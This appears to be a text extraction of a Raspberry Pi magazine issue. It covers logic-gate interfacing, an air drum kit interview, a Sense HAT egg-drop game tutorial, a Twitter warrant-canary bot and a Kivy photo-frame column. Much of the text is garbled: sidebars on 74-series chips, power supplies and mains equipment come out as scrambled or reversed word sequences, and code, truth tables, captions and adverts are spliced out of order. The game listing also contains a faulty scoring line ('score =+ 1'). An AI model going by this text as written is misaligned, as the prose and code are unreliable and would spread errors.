when the inputs are different, otherwise the output is 0. IC logic families AND NAND OR NOR 7400 type of logic devices is the One of the most common , the form 74<family><id> of s ber num t par e hav series. These <id> is a number and ily fam es seri 0 740 where <family> is the ers at the n. There might also be lett that defines the functio , for 00N 4LS SN7 se. tho ignore star t and end, but you can ily device (LS) and fam y ottk Sch wer -po example, is a low each chip d 2-input NAND gate (ie its function (00) is a qua OTHER LOGIC FUNCTIONS NOT The inverter and the various types of gate are the most fundamental logic components, but they’re just the tip of the iceberg. Dozens of other components are available, although in reality, nearly all of their functionality could be duplicated by some combination of the basic logic components. Most of these components have symbols that are just rectangular boxes with their inputs and outputs labelled, so you’d need to consult the truth tables, which appear in their specification sheets, to understand their function. Because we’re going to use it later in the step-by-step, we’ll look at just one example which goes by the name 2-to-4 decoder. The truth table of one of the two the 2-to-4 decoders in the 74HC139 chip appears here (X means ‘either 0 or 1’). XNOR XOR 74 series D gates). There are several contains four 2-input NAN to the Pi’s ctly dire ng wiri for able suit families and most are not puts, and k with 3.3V inputs and out ch GPIO pins. Some won’t wor -mounting packages, whi ace surf in le ilab ava several are only recommendation is Our up. wire to s teur are difficult for ama ilable in 3.3V compatible and is ava the 74HC family, which is through-hole packages. Input 1 E 1 A1 X A0 X Output Y3 Y2 1 1 Y1 1 Y0 1 0 0 0 1 1 1 0 0 0 1 1 1 0 1 0 0 1 1 0 1 1 0 0 1 1 1 1 0 First, the device has a so-called enable input, E. The device is only enabled if this input is at logic 0. If the device isn’t enabled, all its outputs will be high. Once enabled, one of the four outputs will go to logic 0 depending on the binary number on the inputs A0 and A1. So, for example, inputs of 1 and 0 (binary 10 = decimal 2) will result in a logic 0 on output Y2. 63 Feature Secrets of Pi interfacing WORK WITH LOGIC GATES TO USE FEWER GPIO PINS Logic circuitry can allow you to connect more devices to the Pi’s limited GPIO pins 01 Use a logic simulator Before looking at some examples of logic circuitry, here’s a tip to help you check your ideas out without wiring anything up at all. If you’re not quite sure which logic devices you need, this will allow you to be sure before placing an order for components. The secret is to use a logic simulator and there are lots to choose from, some that run locally under various operating systems and some that run online. Here we’re testing the circuit from Step 6 at logic.ly/demo. 03 Invert the outputs 04 Connect LEDs to 3.3V 05 Implement a bar display (1) The previous diagram shows how a 2-to-4 decoder can be connected to two GPIO pins and provides four signals. However, the outputs are ‘active low’, so if LEDs were wired directly to the outputs, all would be lit except for the one represented by the binary input value. One way to have just the one LED lit at any one time is to use inverters, as shown in the diagram. A 74HC04 chip contains six inverters. As a simpler alternative to inverting the outputs of logic devices with active low outputs, LEDs can be connected to 3.3V instead of 0V. We’ve already seen how driving a LED connected to 0V with a 3.3V signal will illuminate it and exactly the opposite is also true. The diagram shows an LED wired in this configuration and it will be lit if a logic 0 is applied to it, either directly from a GPIO pin or from an external logic device. 02 Use a 2-to-4 decoder Driving four LEDs usually requires four GPIO pins. However, if we have an application where only one of them needs to be illuminated at any one time, as might be the case if the LEDs were indicating a status, we can make do with just two GPIO pins. This is achieved using a 2-to-4 decoder. As we’ve already seen, this outputs a logic 0 on one of its four outputs depending on the binary value on its inputs. A 74HC139 chip contains two 2-to-4 decoders and the diagram shows one driving four LEDs. 64 A bar display, like those sometimes seen on audio equipment, demonstrates the flexibility of external logic. We need to light no LEDs, one LED, two LEDs and so on up to four LEDs depending on a 2-bit binary value output on GPIO pins. This uses a 74HC139 again. The diagram is the first stage in providing this functionality and you’ll notice that, although similar to the circuit in Step 3, a third GPIO pin is also used to drive the enable pin so that all the LEDs can be turned off. 06 Implement a bar display (2) So far we have a circuit much like that in step 3, but with a means of turning off all the LEDs. The circuit in this step shows how adding three AND gates causes binary 00 to drive LED 1; binary 01 to drive LEDs 1 and 2; binary 10 to drive LEDs 1, 2 and 3; and binary 11 to drive LEDs 1, 2, 3 and 4. Looking back at the truth table for the AND gate, it should be fairly clear how this circuit achieves this. 07 Drive a seven-segment LED Driving a seven-segment LED without external logic requires seven GPIO pins plus an eighth if you want to drive the decimal point. This can be reduced to four or five respectively by using a 74HC4511. This seven-segment encoder turns on the appropriate LEDs in the seven-segment display depending on the 4-bit binary value on its inputs. An interesting exercise is to work out how to drive a 4-digit seven-segment display – it doesn’t need four times as many GPIO pins if you multiplex them. 09 Very often when you use logic chips, only part of the chip will be used. For example, if you use a 74HC00 quad NAND gate and you use only two of the four gates, two of them will be left unused. This is not a problem, but you shouldn’t leave unused inputs unconnected as they can oscillate, causing the chip to draw an excessive current and overheat. The solution is to wire any unused inputs to either 3.3V or 0V. Unused output is OK and should be left unconnected. 10 08 Encode a switch It’s not just outputs driving LEDs that can benefit from logic. By definition, a multi-way switch can only have one of its positions closed at once, so the output from a 4-way switch can be encoded as a 2-bit binary number. This is the opposite of decoding that we saw in Step 2. A chip that can do this is the 74HC148, which is actually an 8-to-3 line encoder, but we can use it as a 4-to-2 bit encoder by wiring its eight unused inputs to 3.3V. Power supplies ire a supply of and external devices requ If your interface circuitry header. Even so, if GPIO the on pins by ided 3.3V or 5V, it can be prov would be good unt of external circuitry, it you have a significant amo nd to avoid grou and ply sup the between practice to wire capacitors malfunction. to uit circ that could cause the fluctuations to the supply nF ceramic capacitors, 100 ral seve plus or acit Use a single 100µF cap Connect unused inputs Use 5V logic Occasionally you’ll want to interface 5V logic circuitry, which you can’t connect directly to your Pi. There are several level converter chips, but most are unidirectional. However, Texas Instruments’ TXB0102, TXB0104 and TXB0108 chips (2, 4 and 8 channels, respectively) are bidirectional, which means that they’ll work if the GPIO pins are configured as input or outputs. The Texas devices are fiddly surface-mount chips, but several companies offer the TXB0104 and TXB0108 on breakout boards which are much easier to handle. ICs. If you and wired close to those one per IC in your circuit, easiest solution is to the 5V, and 3.3V than r need a supply othe eries. If a pack of several 1.5V AA batt use a battery or, perhaps, eries, or batt with ined obta be ily ’t eas you need a voltage that can you ery, batt one from s supply voltage you want to create several lator. regu age volt a ed call ent can use a compon linuxuser.co.uk 65 Feature forrfac Pi Hackers ing rets of Pi inte ture SecElectronics Fea EXCEED LIMITS SAFELY Interface devices that exceed the GPIO’s maximum voltage or current rating. Interface to m ains equipm ent ment isn’t difficult Designing circuitry to control mains equip destroy your Pi or but, if something goes wrong, you could that you can buy for this electrocute yourself. There are HATs either since the these mend recom don’t we purpose, but ge circuitry. If a -volta lower the to close mains terminals are set your Pi on fire, blow wire comes loose, therefore, you could your face, or leave high up a component, firing shrapnel into ngers. fi your to close y riousl voltages preca use off-the-shelf For this reason, we recommend that you to the mains-powered interfaces in which the only connection socket. Energenie devices is through a domestic-style 13A trolled sockets e-con remot 13A offers k) u.co.u (energenie4 et rather like a hands olled contr radioa that can be used with can be used with a radio TV remote control. Alternatively, they Pi, which can also be transmitter module, designed for the comprising two sockets kit r starte A enie. Energ obtained from ing VAT and delivery. includ 9 £21.9 costs and one Pi interface 66 01202 586442 Pi Marketplace e ad M in Love your Pi? Love Music? e th ro Pi -D AC Ze ro Ze -D AC Pi P+ M Pi -A Pi -D ig i+ PR O DA C ig iA M -D Pi Pi -D AC + P+ HP K U 10% Discount "Linux10" Twitter: Email: Web: @IQ_audio info@iqaudio.com IQaudIO PiMusicBox IQaudio Limited, Cricklade Wiltshire. Company No.: 9461908 Motion tracking To help get the controller tracking in place, David had to use TkInter. The app he made enabled David to factor in both the movement and speed of the controller, with different sounds achievable based on certain combinations of these factors Trigger support To get three sounds on each controller, David had to use the triggers as the primary component for the third sound. The pressing of the trigger, along with a specific motion of the controller, helps give off the sound of a cymbal or extra drum Controller compatibility Response time One of the key factors about the project was to make sure that the sound response time was kept to a minimum. The Raspberry Pi 3 proved to be the perfect fit here, helping turn motion and triggers from the controllers into one of the implemented drum sounds Right Both motion and speed are tracked directly by the Pi unit, which helps to then trigger the drum and cymbal sounds achieved by the controllers Below The project started from David’s purchase of a Silverlit Air Drum Kit, which was heavily modified for compatibility with the Raspberry Pi unit Components list ■ Raspberry Pi 3 ■ Nintendo Wii controllers ■ Silverlit Air Drum Kit ■ Python cwiid library ■ TkInter ■ Open-source drum samples 68 David detailed that getting two controllers two work simultaneously was one of the biggest issues. He instead had to do some heavy tinkering with each controller’s MAC addresses to get them both working with the Pi, but also in tandem with one another My Pi project Raspberry Pi air drum kit David Pride’s air drum kit turns the Raspberry Pi into a musical maestro Where did the original idea for the drum kit stem from? What’s always interesting to me is where we find our sources of inspiration. These can be a person, a book, a tweet, a website – anything at all. A lot of my project ideas start when I find something at the local car boot sale. This time what I found was an Air Play ‘Air Drum’ – being offered for the grand sum of £1! How could I possibly refuse? So I took it home and had a quick play and to be honest, while the concept is great, the actual functionality was a bit limited, the sound quality was rubbish and it was also a bit suspect as to what sound played with what movements. How was the build process? Did you encounter any issues? This got me to thinking whether I could make something more effective using a Raspberry Pi. We’ve been playing around with Wii controllers at both Cotswold Raspberry Jam and Cheltenham Hackspace recently. We’ve built several mini-bots for a bot-versus-bot challenge known as ‘Pi Noon’. Neil Caucutt from Cheltenham Hackspace has done an amazing job designing the chassis for these bots. They use the excellent Python cwiid library that lets you use Wii controllers with the Raspberry Pi. I’d only managed to ever get one controller working with a single Pi before so the first challenge was to get a pair of controllers working as the ‘sticks’. Once I’d identified that by using the MAC address of each controller, multiple controllers can be ‘read’ by a single Pi this gave me the ability to set up two controllers as a pair of drum sticks. How are controller movements actually tracked? I found a bunch of open source drum samples that were available as .wav files – there are literally thousands of these out there to choose from. I then wrote a small TkInter app that displayed the position of the controller to give me an idea of the data that was being produced. Interestingly the position and accelerometer data from the Wii controller is all wrapped up in a single xyz Python tuple. This caused some confusion initially as if you move slowly from point A to point B this produces a very different reading than if the same movement is done rapidly. After playing around for a while (quite a long while!), I managed to map four distinct movements to four different drum sounds. acceptable on a Pi 3, I posted the code to Github and others have also been having fun with it. I’ve seen one version that uses my controller code and PyGame to play the sound files; this seems to work better on older versions of the Pi. Is there any way you see this project being expanded on? Integrating more sounds perhaps? In regards to what else could be done, I am interested in seeing if the actual mechanics from the Wii controllers could be mounted in a pair of gloves; this could be a really interesting experiment. Additionally, I’d like to configure a more refined output that can generate MIDI signals rather than just playing stock sound files, this would really open up a whole range of different possibilities. “What I found was an Air Play ‘Air Drum’ – being offered for the grand sum of £1! How could I refuse?” Were there any limits to the sounds you can implement? I initially wanted to get three sounds on each controller, but the movement scale was a bit too tight to do it successfully every time and two sounds often overlapped. So, I am using the trigger button combined with the movement for one of the sounds on each controller. This gives six different drum sounds, three per controller, that can be played easily without them overlapping. Did you find the Pi a good board? I found the response time to be very Many of our readers will know about your Pi exploits. What’s next for you? Any big projects in the pipeline? In regards to what comes next, I am very fortunate in that I’ve just got my hands on a 3D printer so have been having a lot of fun experimenting with that. I’ve designed a LEGOcompatible case for the tiny Raspberry Pi Zero, which is proving extremely popular. I’ve been selected to take part in Pi Wars, the Raspberry Pi robotics competition that takes place in April 2017 so I’ll be doing a lot of preparation for that event too in the coming months. David Pride is a Raspberry Pi devotee who has played a major role in Pi-centric events throughout the UK. Like it? David has been massively involved with the Pi community for a number of years, and we’ve featured several of his projects previously. We highly recommend you check out his Connect 4 robot, which was another novel way into integrating the Raspberry Pi into a different type of project:. ly/2fbsSnW Further reading While the air drum kit may be a niche project to undertake, David does explain that this is very much a beginner-friendly project to get started with. A visual look at the project can be found over at: http:// bit.ly/2gnkeEB, while all the necessary code can be yours from his official GitHub listing: http:// bit.ly/2gnll7b 69 Tutorial Make an egg-drop game with the Sense HAT Use the same hardware that Major Tim Peake used on the ISS and code your own drop-and-catch game Dan Aldred is a Raspberry Pi Certified Educator and a Lead School Teacher for CAS. He led the winning team of the Astro Pi Secondary School contest and appeared in the DfE’s ‘inspiring teacher’ TV advert. Recently he graduated from Skycademy, launching a Raspberry Pi attached to a high altitude balloon to over 31,000 metres into the stratosphere. Some of the most basic and repetitive games are the most fun to play. Consider Flappy Bird, noughts and crosses or even catch. This tutorial shows you how to create a simple drop-andcatch game that makes excellent use of some of the Sense HAT’s features. Start off by coding an egg – a yellow LED – to drop each second, and a basket – a brown LED – on the bottom row of LEDs. Use the Sense HAT’s accelerometer to read and relay back when you tilt your Sense HAT left or right, enabling you move the basket toward the egg. Successfully catch the egg and you play again, with a new egg being dropped from a random position… But, if you miss one, then it breaks and it’s game over! Your program will keep you up to date with how you are progressing, and when the game ends, your final score is displayed. If you don’t own a Sense HAT, you can use the emulator that is available on the Raspbian with PIXEL operating system. You can also see the Egg Drop game in action here: youtube.com/watch?v=QmjHMzuWIqI 01 Import the modules First, open your Python editor and import the SenseHAT module, line 1. Then import the time module, line 2, so you can add pauses to the program. The random module, line 3, is used to select a random location from the top of the LEDs, from which the egg will drop. To save time typing ‘SenseHAT’ repeatedly, add it to a variable, line 4. Finally, set all the LEDs to off to remove the previous score and game data, line 5. from sense_hat import SenseHat import time import random sense = SenseHat() sense.clear() 02 ■ Sense HAT ■ Raspbian with Pixel OS with Sense HAT emulator game_over = False basket_x = 7 score = 0 03 Measure the basket movement: part 1 The basket is controlled by tilting your Sense HAT to the left or right, which alters the pitch. Create a function to hold the code, which will be used to respond to the movement and move the basket. On line 1, name the function; include the pitch reading and the position of the basket, basket_x. Use sense.set_pixel to turn on one LED at the bottom-right of the LEDs matrix, the co-ordinates (7,7), line 2. Then set the next position of the basket to the current position so that the function is updated when it runs again. This updates the variable with the new position of the basket and turns on the corresponding LED. This has the effect of looking like the basket has moved. def basket_move(pitch, basket_x): sense.set_pixel(basket_x, 7, [0, 0, 0]) new_x = basket_x Set the variables Next, create the variables to hold the various game data. On line 1, create a global variable to hold the status of the game. This records whether the game is in play or has ended. The global enables the status to be used later on in the game with other parts of the program. On line 2, create another variable to hold your game score. Set the game_over variable on line 3 to False, this means the game is not over. The position of each LED on the matrix is referred to by the co-ordinates x and y, with the top line being number 0 down to number 7 at the bottom. Create a variable to hold the position of the basket, which is set on the bottom line of the LEDs, number 7. Finally, set the score to zero. global game_over global score 70 What you’ll need 04 Measure the basket movement: part 2 The second part of the function consists of a conditional which checks the pitch and the basket’s current position. If the pitch is between a value of 1-179 and the basket is not at position zero, then the Sense HAT is tilted to the right and therefore the basket is moving to the right. The second condition checks that the value is between 359 and 179, which means that the tilt is to the Make a fun game PIXEL INSPIRATION Johan Vinet has some excellent and inspirational examples of 8×8 pixel art, which include some famous characters and will show you what you can create with 64 pixels of colour. johanvinet.tumblr.com/image/127476776680 left, line 3. The last line of code returns the x position of the basket so it can be used later in the code – see Step 13. if 1 < pitch < 179 and basket_x != 0: new_x -= 1 elif 359 > pitch > 179 and basket_x != 7: new_x += 1 return new_x, Full code listing from sense_hat import SenseHat ###Egg Drop### ###Coded by dan_aldred### import time import random sense = SenseHat() sense.clear() global game_over global score game_over = False basket_x = 7 score = 0 '''main pitch measurement''' def basket_move(pitch, basket_x): sense.set_pixel(basket_x, 7, [0, 0, 0]) new_x = basket_x if 1 < pitch < 179 and basket_x != 0: new_x -= 1 elif 359 > pitch > 179 and basket_x != 7: new_x += 1 return new_x, 05 Create images for your game Images are built up of pixels that combine to create an overall picture. Each LED on the matrix can be automatically set from an image file. For example, an image of a chicken can be loaded, the colours and positions calculated, and then the corresponding LEDs enabled. The image needs to be 8×8 pixels in size so that it fits the LED matrix. Download the test picture file, chicken.png, and save it into the same folder as your program. Use the code here in a new Python window to open and load the image of the chicken (line 3). The Sense HAT will do the rest of the hard work for you. from sense_hat import SenseHat sense = SenseHat() sense.load_image("chicken.png") 06 '''Main game setup''' def main(): global game_over '''Introduction''' sense.show_message("Egg Drop", text_ colour = [255, 255, 0]) sense.set_rotation(90) sense.load_image("chick.png") time.sleep(2) sense.set_rotation() '''countdown''' countdown = [3, 2, 1] for i in countdown: sense.show_message(str(i), text_ colour = [255, 255, 255]) basket_x = 7 egg_x = random.randrange(0,7) egg_y = 0 sense.set_pixel(egg_x, egg_y, [255, 255, Create your own 8×8 image The simplest method to create your own image with the LEDs is a superb on-screen program that enables you to manipulate the LEDs in real-time. You can change the colours, rotate them and then export the image as code or as an 8×8 PNG file. First, you need to install Python PNG library; open the Terminal window and type: sudo pip3 install pypng After this has finished, type: git clone RPi_8x8GridDraw Once the installation has completed, move to the RPi folder: 0]) sense.set_pixel(basket_x, 7, [139, 69, 19]) time.sleep(1) while game_over == False: global score '''move basket first''' '''Get basket position''' pitch = sense.get_orientation() ['pitch'] basket_x, = basket_move(pitch, basket_x) '''Set Basket Positon''' sense.set_pixel(basket_x, 7, [139, 69, 19]) time.sleep(0.2) cd RPi_8x8GridDraw 71 Tutorial Now enter the command: python3 sense_grid.py …to run the application. sense.show_message("Egg Drop", text_colour = [255, 255, 0]) 09 Display your start image Once the start message has scrolled across the Sense HAT LED matrix, you can display your game image, in this example a chicken. Due to the orientation of the Sense HAT and the location of the wires, you’ll need to rotate it through 90 degrees so it faces the player, line 1. Load the image with the code sense.load.image, line 2. Display the image for a few seconds using time.sleep(), line 3. Note that the lines from now on are indented in line with the previous line. sense.set_rotation(90) sense.load_image("chick.png") time.sleep(2) sense.set_rotation() 07 Create and export your image The Grid Editor enables you to select from a range of colours displayed down the right-hand side of the window. Simply choose the colour and then click the location of the LED on the grid; select ‘Play on LEDs’ to display the colour on the Sense HAT LED. Clear the LEDs using the Clear Grid button and then start over. Finally, when exporting the image, you can either save as a PNG file and then apply the code in the previous step to display the picture, or you can export the layout as code and import that into your program. 10 Count down to the game starting Once the start image has been displayed, prepare the player to get ready for the game with a simple countdown from three to one. First create a list called countdown, which stores the values 3, 2, and 1, line 1. Use a for loop, line 2, to iterate through each of the numbers and display them. This uses the code sense.show_message(str(i) to display each number on the LEDs. You can adjust the colour of the number using the three-part RGB values, text_colour = [255, 255, 255]), line 3. countdown = [3, 2, 1] for i in countdown: sense.show_message(str(i), text_colour = [255, 255, 255]) 11 08 Display a message: the game begins Now you have an image, you are ready to create the function that controls the whole game. Create a new function, line 1, called main, and add the code: sense.show_message …to display a welcome message to the game, line 3. The values 255, 255 and 0 refer to the colour of the message (in this example, yellow). Edit these to choose your own preferred colour. def main(): global game_over 72 Set the egg and basket As the game starts, set the horizontal position, the ‘x’ position, of the basket to 7; this places the basket in the bottom right-hand corner of the LED matrix. Now set the x position of the egg at a random positon between 0 and 7, line 2. This is at the top of the LED matrix and ensures that the egg does not always fall from the same starting point. Last, set the egg’s y value to 0 to ensure that the egg falls from the very top of the LED matrix, line 3. basket_x = 7 egg_x = random.randrange(0,7) egg_y = 0 12 Display the egg and basket In the previous step, you set the positions for the egg and the basket. Now use these variables to display them. On line 1, set the egg using the code sense.set.pixel followed by its x and y co-ordinates. The x position is a random position between 0 and 7, and the y is set to 0 to ensure that the egg starts from the top. Next, set the colour to yellow. (Unless your egg is rotten, in which case Make a fun game set it to green (0,255, 0). Next, set the basket position using the same code, line 2, where the x position is set to 7 to ensure that the basket is displayed in the bottom right-hand LED. Set the colour to brown using the values 139, 69, 19. sense.set_pixel(egg_x, egg_y, [255, 255, 0]) sense.set_pixel(basket_x, 7, [139, 69, 19]) time.sleep(1) 13 Move the basket: part 1 Begin by checking that the game is still in play (the egg is still dropping), checking that the game_over variable is False, line 1. On line 2, import the score. Next, take a reading of the ‘pitch’ of the Sense HAT, using the code sense.get_orientation()['pitch'], line 3. Note that this is the value derived from the function you created in steps 4 and 5. The final line of code uses the function to turn off the LED that represents the basket and then looks at the value of the pitch, determining if the Sense HAT is tilted to the left or right, and then either adds or subtracts one from the x position of the current LED. This has the effect of selecting either the adjacent left or right LED to the current LED. Finally, update the basket_x value with the new position value. while game_over == False: global score pitch = sense.get_orientation()['pitch'] basket_x, = basket_move(pitch, basket_x) 14 Move the basket: part 2 Your program has now calculated the new position of the basket. Next, turn on the relevant LED and display the basket in its new position. On line 1, use the code sense.set_pixel(basket_x, 7, [139, 69, 19]) to set and turn on the LED; basket_x is the value calculated in the previous step using the function in steps 4 and 5. Add a short time delay to avoid over-reading the pitch, line 2. You now have a basket that you can move left and right. Full code listing (cont.) '''Egg drop''' sense.set_pixel(basket_x, 7, [0, 0, 0]) sense.set_pixel(egg_x, egg_y, [0, 0, 0]) egg_y = egg_y + 1 #print (egg_y) sense.set_pixel(egg_x, egg_y, [255, sense.set_pixel(basket_x, 7, [139, 69, 19]) time.sleep(0.2) 15 Drop the egg: part 1 The egg is dropped from a random position from one of the LEDs across the top line. To make it appear to be dropping, first turn off the LED that represents the egg using the code sense.set_pixel(egg_x, egg_y, [0, 0, 0]). The values 0, 0, 0, refer to black and therefore no colour will be displayed; it will appear that the egg is no longer on the top line. sense.set_pixel(egg_x, egg_y, [0, 0, 0]) 16 Drop the egg: part 2 Since the egg drops downwards, you only need to update the y axis position. Do this on line 1 by updating the egg_y variable using the code egg_y = egg_y + 1, which means it will change from an initial value of zero to a new value of one. (The next time the ‘game loop’ runs, it will update to two and so on until the egg reaches the bottom of the matrix, a value of seven). Once the y position is updated, display the egg in its new position, using sense.set_pixel, line 2. The egg will appear to have dropped down one LED toward the bottom. egg_y = egg_y + 1 sense.set_pixel(egg_x, egg_y, [255, 255, 0]) 255, 0]) '''Check posiion of the egg and basket x , y''' if (egg_y == 7) and (basket_x == egg_x or basket_x-1 == egg_x ): sense.show_message("1up", text_ colour = [0, 255, 0]) sense.set_pixel(egg_x, egg_y, [0, 0, 0])#hides old egg egg_x = random.randrange(0,7) score = score =+ 1 egg_y = 0 elif egg_y == 7: sense.show_message("Game Over", text_colour = [255, 38, 0]) return score game_over = True break main() time.sleep(1) sense.clear() sense.show_message("You Scored " + str(score), text_colour = [128, 45, 255], scroll_speed = 0.08) 73 Tutorial egg_x = random.randrange(0,7) score = score =+ 1 egg_y = 0 20 What happens if you miss the egg? If you miss the egg or drop it, then the game ends. Create a conditional to check that the egg’s y position is equal to or greater than 7, line 1. Display a message that states that the game is over, line 2, and then return the value of the score that is displayed across the LED matrix in step 23. 17 elif egg_y == 7: sense.show_message("Game Over", text_colour = [255, 38, 0]) return score Did you catch the egg? At this stage in the tutorial, you have a falling egg and a basket that you can move left and right as you tilt the Sense HAT. The purpose of the game is to catch the egg in the basket, so create a line of code to check that this has happened, line 1. This checks that the egg is at the bottom of the LED matrix, ie in position 7, and that the basket’s x position is the same value as the egg’s x position. This means that the egg and the basket are both located in the same place and therefore you have caught the egg. if (egg_y == 7) and (basket_x == egg_x or basket_x-1 == egg_x ): 18 Success! If you catch the egg in the basket, then you gain one point. Notify the player by scrolling a message across the LEDs using the sense.show.message(), line 1. Write your own message and select a colour. Since you have caught the egg, it should disappear as it is in the basket; to do this set the ‘egg’ pixel to a colour value of 0, 0, 0. This basically turns off the egg LED, making the egg disappear. Note that these lines are both indented. sense.show_message("1up", text_colour = [0, 255, 0]) sense.set_pixel(egg_x, egg_y, [0, 0, 0]) 19 Set up for the next round Since you caught the egg, you get to play the game again. Set a new egg to drop from a random x position on the LED matrix, line 1. Update your score by one point and then set the egg’s y position to 0, line 3. This ensures that the egg is back at the very top of the LED matrix before it starts dropping. 74 21 Stop the game Since the game is over, change the game_over variable to True, which stops the game loop from running again and then runs the last line of the program. game_over = True break 22 Start the game The main instructions and game mechanics are stored in one function called main(), which holds most of the game structure and processes. Functions are located at the start of a program to ensure that they are loaded first, ready for the program to use. To start the game, simply call the function (line 1), add a small delay (line 2), and ensure all the LEDs are set to off before the game starts (line 3). main() time.sleep(1) sense.clear() 23 Display your final score If you did not catch the egg, then the game is over and your score is scrolled across the LEDs. This uses the line sense.show_message and then pulls the value from the global_score variable; convert this value into a string using str, line 1. Your program is now completed; save the file and then run it. Press F5 on the keyboard to do this. After the opening image and message are displayed, the countdown will begin and the game will start. Can you catch the egg? sense.show_message("You Scored " + str(score), text_colour = [128, 45, 255], scroll_speed = 0.08) EXPLORE THE TECH INSIDE w w w.gad getdaily.x y z Available from all good newsagents and supermarkets ON SALE NOW SAVE £5,000 A YEAR THE COOLEST KIT TECH TO SUPERCHARGE YOUR LIFE TECH TEARDOWNS BUYING ADVICE PLAYSTATION 4 PRO TIPS SCIENCE EXPLAINED HOW DOES FOAM WORK? HOW TO GUIDES Nonpolar end AIR Polar end AIR WATER WATER Without an emulsifier added to the mixture, air and water just won’t mix –’s in the siphon – handy for creating foams of any density £/gadget_magazine Tutorial Make Raspberry Pi-based warrant canary Protect yourself from Orwellian gagging orders and secret warrants with your own warrant canary ‘personal website’, enter the URL of your Twitter channel. Tick to say you’ve read and agreed to the developer agreement then click Create your Twitter Application. Nate Drake (@natewriter) is a freelance tech journalist specialising in cyber security. He decided to use Twitter for his own warrant canary after watching hours of cartoons. What you’ll need ■ Suitable for all models of Raspberry Pi The warrant canary borrows its name from the unfortunate bird that was taken down mine shafts. It’s a reaction against secret requests to obtain customer’s personal data. For example, when a court order is served on a business, its owners are forbidden from alerting users that their data has been compromised. Warrant canaries cleverly slalom around this legal hurdle through regularly making a statement that they have not been subject to such a request. If they switch off their warrant canary, as Reddit did in March 2016, users will know that an external agency also has access to the data a company stores about them. The legal ramifications of this are complex and depend on where you are in the world; this tutorial is an exercise in proof-of-concept only. For this tutorial we will use the Raspberry Pi along with a dedicated Twitter bot to build your own warrant canary. Left Use a valid e-mail address and phone number to create a new account 01 Create a Twitter account Head to Twitter.com and create a new Twitter account. You will need a valid e-mail address and mobile phone number. If you already have a Twitter account, make sure to add a phone number, as this is required in order to use a Twitter Bot. See https:// support.twitter.com/articles/110250# for help with this. Left If possible leave this page open, as you’ll need the API Keys and Access Tokens shortly 03 Create your Access Token Click on Keys and Access Tokens. Make a note of your API keys. Next, scroll to Token Actions and click Create My Access Token. Write down the Access Token and the Access Token secret. Your Raspberry Pi will need this information in order to be able to connect securely to Twitter later. Left Click Edit Profile to amend your details. Confirm your e-mail address before proceeding 04 Tweak profile Optionally at this stage you can choose to delete your mobile phone number from Twitter. It is only required once in order to deter spammers. Feel free at this stage to add a profile picture to your account and update the bio to explain what your warrant canary is for. BEST PRACTICES Left Fill in Name, Description and Website. The other fields can be left blank 02 Create the application Once your account is set up, go to. com on any advice and click Create New Application to begin setting up a dedicated bot for your warrant canary. Under 76 Twitter has strict safeguards against spam bots. This is why it requires accounts using Applications to be verified by SMS. You may notice when testing your script that Twitter will also not allow duplicate statuses. Make sure that your tweets are well spaced apart. The above tutorial will have your Pi’s canary tweet every day at midnight. If you need them to be closer together the raspberrypi. org website has some tips on using Twython to post messages at random from a list. Warrant canary ARE WARRANT CANARIES LEGAL? Left Twython is a Python wrapper for Twitter’s API 05 Install Software on the Pi Open Terminal on your Pi or connect via SSH. Run… sudo apt-get update and sudo apt-get upgrade to update Raspbian. Next run sudo pip install twython requests requests_oauthlib The legal loophole that warrant canaries supposedly exploit has yet to be tested. In 2015 Australia outlawed them altogether and other countries may follow suit, threatening punishment if the canary isn’t maintained. Prosecution would be difficult however without revealing the existence of the very information the original warrant was designed to suppress in open court. It’s fine to make one as a proof of concept, but you’ll need to research to find out if actually using one as an injunction warning system is legal where you are. …to install all necessary software. 06 Create the Python script In the Pi Terminal, run the command… Left When entering the keys, make sure there are no spaces inside the quote marks sudo …to create your script. Next paste in the following: #!/usr/bin/env python import sys from twython import Twython Left This command sets the canary to tweet every day at midnight. See for more options If this is the first time you’ve run crontab, choose option 2 to select an editor. Scroll to the bottom and paste the following: 0 0 * * * /usr/bin/python /home/pi/canary.py tweetStr = “I have not been subject to any government gagging orders and/or subpoenas at the time of this Tweet.” # Insert your API keys and access tokens here apiKey = ‘yourapikey’ apiSecret = ‘yourapisecret’ accessToken = ‘youraccesstoken’ accessTokenSecret = ‘youraccesstokensecret’ api = Twython(apiKey,apiSecret,accessToken,accessToke nSecret) api.update_status(status=tweetStr) print “Tweeted: “ + tweetStr Left Use the hash (#) symbol to comment out the line starting “tweetStr” 09 Add a photo to your Tweets (Optional) Run sudo nano canary.py Replace “yourapikey” and so on with the actual values from the page. Press Ctrl+X, then Y, then Return to save and exit. 07 Test the script “api.update_status(status=tweetStr) Run this command… python canary.py Left Double-check that the tweet has been sent by visiting your Twitter channel …to test the script. If successful it will display a message saying that the Tweet has been sent. 08 …to edit your Python script. Comment out the line beginning “tweetStr”, then replace the lines… Schedule your canary The warrant canary should be set to tweet daily unless you intervene. In the Pi terminal run the following… sudo crontab -e print “Tweeted: “ + tweetStr@ …with: message = “No FBI here!” with open(‘/home/pi/Downloads/image.jpg’, ‘rb’) as photo: api.update_status_with_media(status=message, media=photo) print “Tweeted: “ + message 77 Python column A Raspberry Pi photo frame With some Python code and a nice display screen, you can turn your Raspberry Pi into a very nice photo frame Joey Bernard Joey Bernard is a true Renaissance man, splitting his time between building furniture, helping researchers with scientific computing problems and writing Android apps In a previous article, we looked at using Kivy as a cross-platform graphical interface framework that you can use with your Raspberry Pi. Unfortunately, we did not have the room to really look at any possible uses. This issue, we will look at one possible use, that of displaying photos on some kind of display. This might be something you do at home, with family pictures, or it could be a slideshow for a business or event. If you didn't get a chance to read the previous article, that is okay. We will review enough of the basics that you should be able to get off to a running start now. You will obviously need a physical display attached to your Raspberry Pi to show the images on. There are several options available, such as the official Python code that does the work of loading images and displaying them. The first step is to get the list of image files to use as part of the photo frame. There are several different ways you could do this. If you wanted to simply use all of the images within a subdirectory, you could create the list with the code here: # get all images in a subdirectory current_dir = dirname(__file__) filelist = glob(join(current_dir, 'images', '*')) This pulls all of the files in the subdirectory named 'images'. If your images are scattered around your filesystem, it might be better to use a text file containing the locations for each of the files you want to "You subclass the App class to Why create the graphical interface" Python? It’s the official language of the Raspberry Pi. Read the docs at python.org/doc 7-inch touch screen. You can also use anything that accepts HDMI as input. You will also need your Raspberry Pi to start up the X11 server when it boots up. By default, Raspbian should do this. But, if you have disabled the X11 server and only use the console, you will need to either re-enable the desktop or just reinstall the OS to have a clean start. The first step is to be sure that the Kivy packages are installed on your Raspberry Pi. If you are running Raspbian, you can do this with the command sudo apt-get install python-kivy python-kivy-examples This also installs a collection of good examples that you can use as jumpingoff points for further projects. With Kivy, you subclass the 